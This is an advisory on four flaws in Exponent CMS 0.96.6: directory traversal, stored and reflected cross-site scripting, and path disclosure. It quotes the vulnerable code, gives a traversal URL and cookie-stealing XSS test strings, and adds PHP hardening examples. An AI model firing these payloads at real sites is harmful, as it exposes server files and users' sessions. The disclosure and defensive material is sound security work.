Exponent Multiple Vulnerabilities

Exponent is a fully-featured, modern CMS written in PHP that enables non-technical people to manage and update their websites with minimal effort. Exponent is also an attractive development platform for traditional and non-traditional web applications. It is a capable CMS: http://www.exponentcms.org

Credit: The information has been provided by Hamid Ebadi ( www.bugtraq.ir Iran Security Research )
The original article can be found at : http://www.bugtraq.ir/articles/advisory/exponent_multiple_vulnerabilities/10

Vulnerable: Exponent 0.96.6-Alpha and below

1 ) Exponent Directory Traversal (Exposure of sensitive information)

Input passed to the "icodir" parameter of "iconspopup.php" is not properly verified before being used as a directory path. The only processing is the removal of PATH_RELATIVE from the value, so "../" sequences survive and the resulting path is opened relative to BASE. This can be exploited by malicious people to list the readable files of any directory the web server account can reach, including directories outside the web root (the file names are disclosed; the script itself does not read the file contents).

Vulnerable Code (iconspopup.php, excerpt; the line numbers are those of the 0.96.6 source) :

    // line 40: the only "sanitisation" is stripping PATH_RELATIVE from the
    // request parameter; "../" sequences survive and are appended to BASE.
    define('ICONDIR', BASE . str_replace(PATH_RELATIVE, "", $_GET['icodir']));
    . . .
    // The attacker-chosen directory is opened and every readable regular
    // file in it is collected for display.
    $dh = opendir(ICONDIR);
    $counter = 0;
    while (($file = readdir($dh)) !== false) {
        if (is_readable(ICONDIR . $file) && is_file(ICONDIR . $file)) {
            $iconfiles[$thisrow][] = $file;
            $counter++;
            if ($counter >= $perrow) {
                $counter = 0;
                $thisrow++;
                $iconfiles[$thisrow] = array();
            }
        }
    }
    } else $good = false;   // the matching "if (...) {" lies above the excerpt
    . . .
    // line 73: every collected file name is echoed back into the page as an
    // image source, so the listing of the traversed directory reaches the
    // requester. (The HTML strings inside these echo calls were lost when
    // the page was extracted; only the PHP is shown.)
    for ($j = 0; $j < count($iconfiles[$i]); $j++) {
        echo '';
        $imgsrc = $_GET['icodir'] . $iconfiles[$i][$j];
        echo "";
        echo '';
    }
    echo '';
    }
    ?>

exploit:
http://[exponent]/iconspopup.php?icodir=/../../../

This request lists the files three directories above the Exponent installation directory.

2 ) Exponent Script Insertion

Input passed to the comment "body" in the "weblogmodule" module (Weblog Comments) is not properly sanitised before being stored and displayed. This can be exploited to insert arbitrary HTML and script code, which is executed in the browser session of every user who views the malicious entry, in the context of the affected site (stored cross-site scripting).
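The following is an added example of how the icodir handling in finding 1 can be hardened; it is not Exponent's own code. BASE and PATH_RELATIVE are the constants the original uses; the icon root "images/icons/" and the scratch directory tree built under the system temp directory are assumptions for this demo. The fix is to canonicalise the requested path with realpath() and refuse anything that does not stay inside the one directory icons are allowed to come from.

```php
<?php
// Added example, not Exponent's own code: a hardened replacement for the
// icodir handling in iconspopup.php. BASE and PATH_RELATIVE exist in
// Exponent; the icon root "images/icons/" is an assumption for this demo.

// Scratch tree standing in for an install: one icon set under the icon root
// and one file above it that must never be listed.
$base = sys_get_temp_dir() . '/exponent_demo_' . getmypid();
mkdir("$base/images/icons/set1", 0700, true);
file_put_contents("$base/images/icons/set1/a.png", 'png');
file_put_contents("$base/secret.php", '<?php // not an icon');

define('BASE', $base . '/');
define('PATH_RELATIVE', '/exponent/');       // URL prefix the original strips
define('ICON_ROOT', BASE . 'images/icons/'); // the only directory icons may come from

/**
 * Resolve a user-supplied icodir value (a path relative to the web root, as
 * the original expects) to a directory inside ICON_ROOT. Returns the canonical
 * directory with a trailing separator, or null if the request escapes the
 * icon root or does not name an existing directory.
 */
function resolve_icon_dir(string $icodir): ?string
{
    // Same normalisation as the original: drop the URL prefix.
    $sub = str_replace(PATH_RELATIVE, '', $icodir);

    // NUL bytes truncate paths in C-level file APIs; refuse them outright.
    if (strpos($sub, "\0") !== false) {
        return null;
    }

    // realpath() resolves "..", symlinks and repeated slashes, and returns
    // false for paths that do not exist, so both sides are compared in
    // canonical form.
    $root = realpath(ICON_ROOT);
    $dir  = realpath(BASE . ltrim($sub, '/'));
    if ($root === false || $dir === false || !is_dir($dir)) {
        return null;
    }

    // Containment: the directory must be ICON_ROOT itself or lie beneath it.
    // Comparing against "$root/" rather than "$root" stops a sibling such as
    // images/icons2 from passing as a child.
    if ($dir !== $root && strpos($dir, $root . DIRECTORY_SEPARATOR) !== 0) {
        return null;
    }
    return $dir . DIRECTORY_SEPARATOR;
}

/** Listing restricted to readable regular files, as the original intends. */
function list_icons(string $icodir): array
{
    $dir = resolve_icon_dir($icodir);
    if ($dir === null) {
        return [];
    }
    $files = [];
    foreach (scandir($dir) as $file) {
        if (is_file($dir . $file) && is_readable($dir . $file)) {
            $files[] = $file;
        }
    }
    return $files;
}

// A legitimate request names a set inside the icon root.
print_r(list_icons('/exponent/images/icons/set1/'));
// The advisory's traversal string, and a traversal that starts inside the
// icon root, both resolve outside it and are refused.
print_r(list_icons('/../../../'));
print_r(list_icons('/exponent/images/icons/set1/../../../'));

// Remove the scratch tree.
unlink("$base/images/icons/set1/a.png");
unlink("$base/secret.php");
foreach (["$base/images/icons/set1", "$base/images/icons", "$base/images", $base] as $d) {
    rmdir($d);
}
```

The first call returns the one icon in set1; the two traversal attempts return an empty array instead of a listing of the directories above BASE. Note that stripping "../" from the input is not an adequate alternative: "....//" collapses back to "../" after one pass, and encoded variants bypass a literal match, whereas a realpath() prefix check judges where the path actually ends up.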
3 ) Exponent Cross-Site Scripting Vulnerabilities

Input passed to the "url" parameter of /external/magpierss/scripts/magpie_debug.php and /external/magpierss/scripts/magpie_simple.php, and to the "rss_url" parameter of /external/magpierss/scripts/magpie_slashbox.php, is not properly sanitised before being returned to the user. This can be exploited to execute arbitrary HTML and script code in a user's browser session in the context of the affected site (reflected cross-site scripting). Similar issues can be found elsewhere in these bundled MagpieRSS scripts.

POC (with a script payload as the parameter value) :
http://HOST/external/magpierss/scripts/magpie_debug.php?url=
http://HOST/external/magpierss/scripts/magpie_slashbox.php?rss_url=

4 ) Exponent Full Path Disclosure Weakness

The scripts "sdk/blanks/formcontrol.php" and "sdk/blanks/file_modules.php" are not meant to be requested on their own. Accessing either of them directly discloses the full filesystem path of the installation (typically through the PHP error message produced when a script that expects to be included is run standalone).

# copyright : http://www.bugtraq.ir
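The following is an added example covering findings 2 and 3 together; it is not Exponent or MagpieRSS code. It shows the same untrusted data rendered the vulnerable way (raw concatenation into the page) and the hardened way (validation of what is accepted, plus output encoding of whatever is displayed), for both a stored comment body and a reflected feed URL. The surrounding markup and the sample inputs are constructed for the demo.

```php
<?php
// Added example, not Exponent or MagpieRSS code: output encoding for the two
// XSS patterns in this advisory, a stored comment body (weblogmodule) and a
// reflected feed URL (magpie_debug.php / magpie_slashbox.php). The markup
// around the values is assumed for the demo.

/** Encode untrusted text for an HTML body or quoted-attribute context. */
function h(string $s): string
{
    return htmlspecialchars($s, ENT_QUOTES | ENT_SUBSTITUTE | ENT_HTML5, 'UTF-8');
}

/** Accept only absolute http(s) URLs as a feed address. */
function is_feed_url(string $url): bool
{
    $p = parse_url($url);
    return $p !== false
        && isset($p['scheme'], $p['host'])
        && in_array(strtolower($p['scheme']), ['http', 'https'], true);
}

/* Vulnerable pattern: request data is concatenated straight into the page. */
function render_vulnerable(string $url, string $comment): string
{
    return '<input type="text" name="url" value="' . $url . '">'
         . '<div class="comment">' . $comment . '</div>';
}

/* Hardened pattern: validate what may be accepted, encode whatever is shown. */
function render_hardened(string $url, string $comment): string
{
    $shown = is_feed_url($url) ? $url : '';
    return '<input type="text" name="url" value="' . h($shown) . '">'
         . '<div class="comment">' . h($comment) . '</div>';
}

// Constructed inputs of the kind the advisory describes.
$attr_breakout     = '"><script>alert(document.cookie)</script>';
$valid_but_hostile = 'http://example.com/feed.rss"><script>alert(1)</script>';
$comment           = '<img src=x onerror="alert(document.cookie)">';

// The first URL is not a URL at all and is dropped by validation; the second
// parses as http(s) and is kept, so the encoding step is what neutralises it.
echo render_vulnerable($attr_breakout, $comment), PHP_EOL;
echo render_hardened($attr_breakout, $comment), PHP_EOL;
echo render_hardened($valid_but_hostile, $comment), PHP_EOL;
```

Validation alone is not enough, as the second URL shows: a value can be a well-formed http URL and still carry a quote that closes the attribute. Encoding at the point of output is the control that holds in every case; if comments are meant to allow a markup subset, keep encoding as the default and pass that subset through an allowlist-based HTML sanitiser rather than stripping tags with a regular expression.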